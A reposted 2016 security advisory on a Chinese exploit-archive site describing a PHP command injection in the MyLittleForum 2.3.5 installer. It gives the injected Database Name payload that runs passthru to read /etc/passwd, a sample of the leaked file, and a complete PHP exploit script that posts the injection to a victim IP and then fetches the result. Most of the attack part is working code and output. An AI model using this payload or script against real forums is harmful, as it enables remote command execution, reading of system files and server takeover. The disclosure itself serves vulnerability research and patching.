首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 MyLittleForum 2.3.5 - PHP Command Injection 来源：hyp3rlinx.altervista.org 作者：hyp3rlinx 发布时间：2016-06-28   /* [+] Credits: hyp3rlinx   [+] Website: hyp3rlinx.altervista.org   [+] Source: http://hyp3rlinx.altervista.org/advisories/MYLITTLEFORUM-PHP-CMD-EXECUTION.txt   [+] ISR: APPARITIONSEC     Vendor: ================= mylittleforum.net   Download: github.com/ilosuna/mylittleforum/releases/tag/v2.3.5     Product: =================== MyLittleForum 2.3.5   my little forum is a simple PHP and MySQL based internet forum that displays the messages in classical threaded view (tree structure). The main claim of this web forum is simplicity. Furthermore it should be easy to install and run on a standard server configuration with PHP and MySQL.     Vulnerability Type: ======================= PHP Command Execution     CVE Reference: ============== N/A     Vulnerability Details: =====================   When setting up mylittleforum CMS users will have to walk thru an installation script and provide details for the application like the forums email address, name, admin email, admin password, database name etc...   However, no input validation / checks exists for that installation script. Low privileged users can then supply arbitrary PHP code for the Database Name. The PHP command values will get written to the config/db_settings.php file and processed by the application. Since we supply an invalid Database Name a MySQL error will be thrown but the injected PHP payload will also be executed on the host system.   If the CMS is installed by low privileged user and that user has basic MySQL database authorization to run the install for the CMS it can result in a privilege escalation, remote command execution and complete takeover of the host server.   The /config/db_settings.php is protected by .htaccess file but we can write directly to "db_settings.php" file and execute code directly from /install/index.php file bypassing any access control provided by the .htaccess file or we just delete it by adding call to PHP function @unlink('.htaccess') to our injected PHP payload.     1) Browse to http://localhost/mylittleforum-2.3.5/install/index.php     2) For Database Name input field enter the below PHP code for POC. ';?><?php echo passthru('/bin/cat /etc/passwd');'   This results in config/db_settings.php file being injected with our arbitrary PHP code. $db_settings['database'] = '';?><?php echo passthru('/bin/cat /etc/passwd');'';     3) Make another HTTP GET request to same page "/install/index.php" file and done!... we access /etc/passwd system file.     HTTP/1.1 200 OK Date: Fri, 24 Jun 2016 03:01:13 GMT Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1m PHP/5.6.8 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/5.6.8 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8   root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin   etc...     Exploit code(s): ===============   1) Download and unpack mylittleforum-2.3.5 upload to web server (Linux), chmod -R 777 etc... 2) Run below PHP script from Command line from remote work station 3) BOOM we can now read Linux "/etc/passwd" file on remote server */   <?php #mylittleforum-2.3.5 PHP CMD Execution Exploit #by hyp3rlinx #ISR: apparitionsec #hyp3rlinx.altervista.org #cat Linux system file '/etc/passwd' POC #tested RH Linux 5 #=======================================================   if($argc<5){ echo "myLittleForum CMS PHP Command Execution Exploit\r\n"; echo "Usage: <IP>,<MySQL-USER>,<MySQL-PASSWD>,<ROOT DIR>\r\n"; echo "================= by hyp3rlinx ===================\r\n"; exit(); }   $port=80;                   #Default port $victim=$argv[1];           #IP $user=$argv[2];             #MySQL username $pwd=$argv[3];              #MySQL password $root_dir=$argv[4];         #/mylittleforum-2.3.5 $uri="/install/index.php";  #PHP CMD inject entry point   $s = fsockopen($victim, $port, $errno, $errstr, 10); if(!$s){echo "Cant connect to the server!"; exit();}   $CMD_INJECTTION="forum_name=PWN".                "&forum_address=http://$victim/$root_dir/". "&forum_email=x@x.com". "&admin_name=$user". "&admin_email=x@x.com". "&admin_pw=$pwd". "&admin_pw_conf=$pwd". "&host=localhost". "&database=';?><?php echo passthru('/bin/cat /etc/passwd');'". "&user=$user". "&password=$pwd". "&table_prefix=mlf2_". "&install_submit=OK+-+Install+forum". "&language_file=english.lang";       #Inject commands     $out = "POST /$root_dir/$uri HTTP/1.1\r\n";     $out .= "Host: $victim\r\n";     $out .= "Content-Type: application/x-www-form-urlencoded\r\n";     $out .= 'Content-Length: ' . strlen($CMD_INJECTTION) . "\r\n";     $out .= "Connection: close\r\n\r\n";     fwrite($s, $out);     fwrite($s, $CMD_INJECTTION);     fclose($s);     sleep(2);       #Second HTTP request to read Linux /etc/passwd file in the response     $out="";     $s = fsockopen($victim, $port, $errno, $errstr, 10);     $out = "GET /$root_dir/$uri HTTP/1.1\r\n";     $out .= "Host: $victim\r\n";     $out .= "Connection: Close\r\n\r\n";     fwrite($s, $out);       $r='';        while (!feof($s)) {          $r=fgets($s, 128);          echo $r;         if(strpos($r,'<!DOCTYPE')!==FALSE){            break;          }        } fclose($s); ?>   /* Disclosure Timeline: ================================= Vendor Notification: No Reply June 27, 2016 : Public Disclosure     Exploitation Technique: ======================= Remote     Severity Level: =========================================== (High) 8.7 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N     [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.   hyp3rlinx */   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Tiki-Wiki CMS Calendar Command ·PInfo 0.6.9-5.1 - Local Buffer ·Prestashop modules Arbitrary F ·HNB 1.9.18-10 - Local Buffer O ·Prestashop modules Arbitrary F ·Ruby HTTP Header Injection ·Wolf CMS 0.8.2 - Arbitrary Fil ·Untangle NGFW 12.1.0 Beta exec ·PCMAN FTP 2.0.7 - ls Command B ·JSON Swagger CodeGen Parameter ·DarkComet Server 3.2 Remote Fi ·Prestashop Attribute Wizard Pr   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved